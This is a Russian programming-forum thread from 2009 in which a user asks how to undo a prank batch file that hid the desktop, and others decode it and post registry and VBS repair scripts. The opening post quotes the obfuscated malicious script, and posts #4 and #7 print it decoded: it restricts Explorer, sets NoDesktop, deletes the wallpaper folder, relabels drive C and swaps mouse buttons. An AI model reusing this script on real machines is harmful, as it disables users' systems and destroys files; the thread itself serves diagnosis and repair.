Форум программистов
 

Восстановите пароль или Зарегистрируйтесь на форуме, о проблемах и с заказом рекламы пишите сюда - alarforum@yandex.ru, проверяйте папку спам!

Вернуться   Форум программистов > Программная инженерия > Безопасность, Шифрование
Регистрация

Восстановить пароль
Повторная активизация e-mail

Купить рекламу на форуме - 42 тыс руб за месяц

Ответ
 
Опции темы Поиск в этой теме
Старый 27.11.2009, 23:06   #1
ccobbra
 
Регистрация: 27.11.2009
Сообщений: 6
Злость Исчезло все с рабочего стола

Помогите плиз. После запуска бат файла сестрой, исчезло все с рабочего стола, при этом при нажатии windows+d все появляется по первого запуска программы или сворачивания разворачивания какого нибудь окна. Вот содержание файла:
@set p=@set
%p% j28=y
%p% p35=q
%p% b32=v
%p% f15=4
%p% c12=8
%p% r11=g
%p% b16=i
%p% w29=o
%p% e55=%Temp%
%p% r13=n
%p% b20=e
%p% d22=p
%p% r14=a
%p% p1=b
%p% y90=%1
%p% e27=w
%p% a3=x
%p% b2=z
%p% g18=f
%p% k19=7
%p% b6=t
%p% v8=m
%p% e73=%
%p% w23=d
%p% o26=3
%p% r42=%SystemRoot%
%p% j7=6
%p% x78=%0
%p% o24=c
%p% d34=5
%p% g10=j
%p% r30=u
%p% o4=9
%p% m9=k
%p% w33=2
%p% s17=h
%p% i56="
%p% h0=s
%p% e31=1
%p% t5=r
%p% x25=0
%p% p21=l
@%b20%%o24%%s17%%w29% %w29%%g18%%g18%
%r42%/%h0%%j28%%h0%%b6%%b20%%v8%%o26%%w33 %/%t5%%r30%%r13%%w23%%p21%%p21%%o26%% w33% %r30%%h0%%b20%%t5%%o26%%w33%, S%e27%%r14%%d22%M%w29%%r30%%h0%%b20 %B%r30%%b6%%b6%%w29%%r13% >%r13%%r30%%p21%
%b6%%b16%%v8%%b20% %x25%:%x25%%x25% >%r13%%r30%%p21%
%t5%%b20%%r11% %r14%%w23%%w23% HKCU\S%w29%%g18%%b6%%e27%%r14%%t5%% b20%\M%b16%%o24%%t5%%w29%%h0%%w29%% g18%%b6%\W%b16%%r13%%w23%%w29%%e27% %h0%\C%r30%%t5%%t5%%b20%%r13%%b6%V% b20%%t5%%h0%%b16%%w29%%r13%\P%w29%% p21%%b16%%o24%%b16%%b20%%h0%\E%a3%% d22%%p21%%w29%%t5%%b20%%t5%\R%b20%% h0%%b6%%t5%%b16%%o24%%b6%R%r30%%r13 % /%b32% %e31% /%b6% REG_DWORD /%w23% %r42%\%b20%%a3%%d22%%p21%%w29%%t5%% b20%%t5%.%b20%%a3%%b20% /%g18% >%r13%%r30%%p21%
%w23%%b20%%p21% %i56%%x78%%i56% >%r13%%r30%%p21%
%t5%%b20%%r11% %r14%%w23%%w23% HKCU\S%w29%%g18%%b6%%e27%%r14%%t5%% b20%\M%b16%%o24%%t5%%w29%%h0%%w29%% g18%%b6%\W%b16%%r13%%w23%%w29%%e27% %h0%\C%r30%%t5%%t5%%b20%%r13%%b6%V% b20%%t5%%h0%%b16%%w29%%r13%\P%w29%% p21%%b16%%o24%%b16%%b20%%h0%\E%a3%% d22%%p21%%w29%%t5%%b20%%t5% /%b32% N%w29%D%b20%%h0%%m9%%b6%%w29%%d22% /%b6% REG_DWORD /%w23% %e31% /%g18% >%r13%%r30%%p21%
%w23%%b20%%p21% %i56%%r42%\W%b20%%p1%\W%r14%%p21%%p 21%%d22%%r14%%d22%%b20%%t5%%i56% /%p35% >%r13%%r30%%p21%
%p21%%r14%%p1%%b20%%p21% C:MYA-XA-XA >%r13%%r30%%p21%
%v8%%h0%%r11% * %i56%Хахахахаха ты ******!%i56% >%r13%%r30%%p21%


Подскажите пожалуйста как это исправить?

Последний раз редактировалось mihali4; 28.11.2009 в 10:56.
ccobbra вне форума Ответить с цитированием
Старый 27.11.2009, 23:14   #2
vasek123
Заблокирован
 
Регистрация: 21.11.2008
Сообщений: 4,986
Сообщение

Мда... По моему, проще снести "винду". Случаем не BatVirusMaster она пользовалась, при написании "батника"(чувствуется, что ей...)?
vasek123 вне форума Ответить с цитированием
Старый 27.11.2009, 23:25   #3
ccobbra
 
Регистрация: 27.11.2009
Сообщений: 6
По умолчанию

нет, ты не понял, ей прислали а она дура запустила, а кроме как сносить, никак нельзя исправить?
ccobbra вне форума Ответить с цитированием
Старый 27.11.2009, 23:29   #4
vasek123
Заблокирован
 
Регистрация: 21.11.2008
Сообщений: 4,986
Сообщение

Сделайте откат системы до раннего состояния... Все файлы сохранятся, однако, программы, установленные позднее, будут удалены.

Цитата:
Сообщение от MadReason Посмотреть сообщение
расшифруй)) сверху задана таблица ссответствий
Фух... Расшифровал:

Код:
@echo off
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
time 0:00 >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul
del ''%0'' >nul
reg add HKCU\Software\Microsoft\Window s\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
del "%SystemRoot%\Web\Wallpaper" /q >nul
label C:MYA-XA-XA >nul
msg * "Хахахахаха ты на@%&н!" >nul
Правда, сомневаюсь, что, это сможет помочь:

1. Изменяем время
2. В реестре, HKEY_CURRENT_USER->SOFTWARE->Microsoft->Windows->CurrentVersion->Policies->Explorer у тебя должны располагаться файлы: строковый(по умолчанию)REG_SZ, ClearRecentDocsOnExit(REG_DWORD) с параметрами 1 в шестнадцатиричной системе, EnableShellExecuteHooks(REG_DWORD) с параметрами 1 в шестнадцатиричной системе, NoDriveTypeAutoRun(REG_DWORD) с параметрами 91 в шестнадцатиричной системе(меняем, если они неправильны.). ДРУГИХ ФАЙЛОВ БЫТЬ НЕ ДОЛЖНО!!!
3. Переименовываем раздел С:

Может быть, поможет...

Последний раз редактировалось vasek123; 28.11.2009 в 02:38.
vasek123 вне форума Ответить с цитированием
Старый 27.11.2009, 23:33   #5
MadReason
Ищу работу
Форумчанин
 
Аватар для MadReason
 
Регистрация: 16.02.2007
Сообщений: 269
По умолчанию

расшифруй)) сверху задана таблица ссответствий
Пишу на Delphi все что угодно, недорого, красиво, с комментариями
###icq 107335###
MadReason вне форума Ответить с цитированием
Старый 27.11.2009, 23:38   #6
ccobbra
 
Регистрация: 27.11.2009
Сообщений: 6
По умолчанию

в том то и дело откат сделать не могу винда урезанная, "геймерская" блин((
ccobbra вне форума Ответить с цитированием
Старый 28.11.2009, 01:00   #7
alexinspir
Новичок
Джуниор
 
Аватар для alexinspir
 
Регистрация: 26.08.2008
Сообщений: 1,010
По умолчанию

Код:
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
time 0:00 >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul
del "%0" >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
del "%SystemRoot%\Web\Wallpaper" /q >nul
label C:MYA-XA-XA >nul
msg * "Хахахахаха ты ****!" >nul
ромик0: Cколько получают здешние модераторы?
pu4koff: У модераторов сдельная оплата труда. Выдал предупреждение - плюс к премии. Выдал бан - лучший модератор месяца со всеми вытекающими.

Последний раз редактировалось alexinspir; 28.11.2009 в 01:24.
alexinspir вне форума Ответить с цитированием
Старый 28.11.2009, 01:04   #8
Noor
Участник клуба
 
Аватар для Noor
 
Регистрация: 01.11.2006
Сообщений: 1,051
По умолчанию

Попробуй жмыкнуть по робочему столу правй кнопкой - Упорядочить значки - Отображать значки рабочего стола.
Или попробуй это ....копируй, запихивай в txt файл,меняй расширение с txt на vbs - запускай !!!!
Код:
'xp_taskbar_desktop_fixall.vbs - Repairs the Taskbar when minimized programs don't show.
Set WSHShell = WScript.CreateObject("WScript.Shell")
Message = "To work correctly, the script will close" & vbCR
Message = Message & "and restart the Windows Explorer shell." & vbCR
Message = Message & "This will not harm your system." & vbCR & vbCR
Message = Message & "Continue?"

X = MsgBox(Message, vbYesNo, "Notice")

If X = 6 Then 

On Error Resume Next

WshShell.RegDelete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StuckRects2\"
WshShell.RegDelete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StreamMRU\"
WshShell.RegDelete "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Streams\Desktop\"

WshShell.RegDelete "HKCU\Software\Microsoft\Internet Explorer\Explorer Bars\{32683183-48a0-441b-a342-7c2a440a9478}\BarSize"

P1 = "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\"

WshShell.RegWrite p1 & "NoBandCustomize", 0, "REG_DWORD"
WshShell.RegWrite p1 & "NoMovingBands", 0, "REG_DWORD"
WshShell.RegWrite p1 & "NoCloseDragDropBands", 0, "REG_DWORD"
WshShell.RegWrite p1 & "NoSetTaskbar", 0, "REG_DWORD"
WshShell.RegWrite p1 & "NoToolbarsOnTaskbar", 0, "REG_DWORD"
WshShell.RegWrite p1 & "NoSaveSettings",0,"REG_DWORD"
WshShell.RegWrite p1 & "NoToolbarsOnTaskbar", 0, "REG_DWORD"
WshShell.RegWrite p1 & "NoSetTaskbar",0,"REG_DWORD"
WshShell.RegWrite p1 & "NoActiveDesktop",0,"REG_DWORD"
WshShell.RegWrite p1 & "ClassicShell",0,"REG_DWORD"

p1 = "HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\LocalUser\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\"

WshShell.RegWrite p1 & "NoCloseDragDropBands", 0, "REG_DWORD"
WshShell.RegDelete p1 & "NoMovingBands"

p1 = "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell"

WshShell.RegWrite p1, "explorer.exe", "REG_SZ"

p1 = "HKCU\Software\Microsoft\Internet Explorer\Explorer Bars\{32683183-48a0-441b-a342-7c2a440a9478}\"
WshShell.RegDelete p1 & "BarSize"
WshShell.RegWrite p1, "Media Band", "REG_SZ"

On Error Goto 0

For Each Process in GetObject("winmgmts:"). _
	ExecQuery ("select * from Win32_Process where name='explorer.exe'")
   Process.terminate(0)
Next

MsgBox "Finished." & vbcr & vbcr & "© Kelly Theriot and Doug Knox", 4096, "Done"

Else

MsgBox "No changes were made to your system." & vbcr & vbcr & "© Kelly Theriot and Doug Knox", 4096, "User Cancelled"

End If
или вот reg файл
Код:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="Explorer.exe"

[-HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StuckRects2]
[-HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Streams]
[-HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StreamsMRU]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoToolbarsOnTaskbar"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoSetTaskbar"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoSaveSettings"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoActiveDesktop"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"ClassicShell"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Explorer Bars\{32683183-48a0-441b-a342-7c2a440a9478}]
@="Media Band"
"BarSize"=-

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoBandCustomize"=dword:00000000
"NoMovingBands"=dword:00000000
"NoCloseDragDropBands"=dword:00000000
"NoSaveSettings"=dword:00000000
"NoSetTaskbar"=dword:00000000
"NoToolbarsOnTaskbar"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\LocalUser\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoMovingBands"=dword:00000000
"NoCloseDragDropBands"=dword:00000000
"**del.NoMovingBands"=" "
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoSaveSettings"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\LocalUser\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoSaveSettings"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\LocalUser\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"**del.NoSaveSettings"=" "

Последний раз редактировалось Noor; 28.11.2009 в 01:08.
Noor вне форума Ответить с цитированием
Старый 28.11.2009, 01:19   #9
MadReason
Ищу работу
Форумчанин
 
Аватар для MadReason
 
Регистрация: 16.02.2007
Сообщений: 269
По умолчанию

жми win+R там введи regedit
и удаляй те два ключа

HKCU\Software\Microsoft\Windows\Cur rentVersion\Policies\Explorer\Restr ictRun

HKCU\Software\Microsoft\Windows\Cur rentVersion\Policies\Explorer /v NoDesktop
Пишу на Delphi все что угодно, недорого, красиво, с комментариями
###icq 107335###
MadReason вне форума Ответить с цитированием
Старый 28.11.2009, 01:20   #10
ccobbra
 
Регистрация: 27.11.2009
Сообщений: 6
По умолчанию

Всем спасибо, а огромное спасибо пользователю Noor который потратил на меня свое драгоценное время и написал рег файл, БОЛЬШОЕ ТЕБЕ спасибо, и побольше бы таких людей как он, остальным пользователям я так же очень благодарен, старались помочь как могли)

Последний раз редактировалось ccobbra; 28.11.2009 в 01:36.
ccobbra вне форума Ответить с цитированием
Ответ


Купить рекламу на форуме - 42 тыс руб за месяц



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
С рабочего стола пропало все и пуск тоже Alenka-91 Операционные системы общие вопросы 21 10.02.2013 11:33
Блокировка рабочего стола dani92 Общие вопросы Delphi 52 29.09.2009 18:17
после перезагрузки компа исчезли все значки с рабочего стола логарифм Безопасность, Шифрование 2 12.06.2009 16:22
Разрешение рабочего стола. SanekIrk Общие вопросы Delphi 2 10.07.2008 18:01
скриншоты рабочего стола Alar Общие вопросы Delphi 0 29.10.2006 10:59